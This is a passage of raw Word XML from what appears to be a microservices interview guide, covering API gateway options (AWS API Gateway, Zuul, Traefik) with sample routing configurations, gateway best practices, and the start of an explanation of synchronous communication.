        <w:t>API Gateway in AWS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D513DD"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Amazon API Gateway is a fully managed service that provides a comprehensive API management solution, including features like authorization, request transformation, and monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0467E9EB"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Serverless architectures and fully managed API solutions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21858DAD" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B98ED42"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Define an API using AWS Management Console or AWS CLI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D2B46C"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Set up resources, methods, and integrations with Lambda functions or HTTP endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32607CF6" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="318"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Zuul</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA6A828"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Zuul is a gateway service from Netflix that provides dynamic routing, monitoring, and security features.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268DE89D"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Java-based environments with integration into Spring Cloud.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D219FF6" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEB3FFF"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zuul:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B02F067"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routes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACD864C"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userservice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A5D438"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path: /user/**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CB548A"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serviceId: user-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38771710" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="318"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Traefik</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBC8DFD"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Traefik is a modern HTTP reverse proxy and load balancer that integrates with Docker, Kubernetes, and other orchestration platforms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA00033" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31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 Containerized and dynamic environments with automatic service discovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64345D79" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35899A6C"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http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF5F873"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routers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49493E1A"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my-router:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E03BB2"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rule: "Host(`example.com`)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5EE3BF"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service: my-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3553E630"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entryPoints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB28412"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web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51818F10"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p>
    <w:p w14:paraId="725A41A2"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services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B94E87A"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my-service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA75746"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loadBalancer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CC1928"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servers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EDEF9F" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7"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 url: "http://backend:5000"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630E634D" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Best Practices for API Gateways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A04782F" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="319"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Keep It Lightweight</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58837C8A" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="319"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Avoid making the API gateway too complex or feature-rich. Its primary role is to manage requests and responses, not to handle business logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474D8F53" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="319"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Health Checks</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05805127" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="319"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Implement health checks to ensure that the API gateway can detect and route around unhealthy backend services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B5EB29" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="319"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Implement Caching Wisely</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0B3AE5" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="319"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use caching to improve performance but ensure it does not introduce stale data issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DF231B" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="319"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Monitor and Log</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C529A54" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="319"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Continuously monitor the API gateway and collect logs to diagnose issues and understand traffic patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F741FD" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="319"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Secure the Gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AB4699" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="319"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Implement strong security practices, including SSL/TLS, authentication, and authorization, to protect the API gateway and backend services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC0448E" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="319"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Plan for Scaling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2712E7C9" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="319"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Ensure that the API gateway can scale with the number of requests and services. Consider using load balancing and clustering techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DE9BC9" w14:textId="77777777" w:rsidR="0018537F" w:rsidRPr="00DA2F32" w:rsidRDefault="0018537F" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="694FDEDB" w14:textId="5E0B3832" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="115" w:name="_Toc178383298"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Explain the differences between synchronous and asynchronous communication in microservices.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="115"/>
    </w:p>
    <w:p w14:paraId="64D1BD0C" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Synchronous Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4E6560"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Definition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239402EC" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="320"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In synchronous communication, a service makes a request to another service and waits for a response before proceeding. The requester is blocked until it receives the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0040D28F"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Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DA5B9D" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="321"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Blocking:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> The client waits for the response before continuing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F9818F" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="321"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Real-Time:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Typically used for real-time interactions where an immediate response is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEC25EA" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="321"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Request-Response Model:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Follows a direct request-response pattern where the client sends a request and expects a reply.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0477491E"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Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3CC5D5" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="322"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Immediate Feedback:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Provides immediate results or responses, making it suitable for interactive applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097E7697" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="322"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
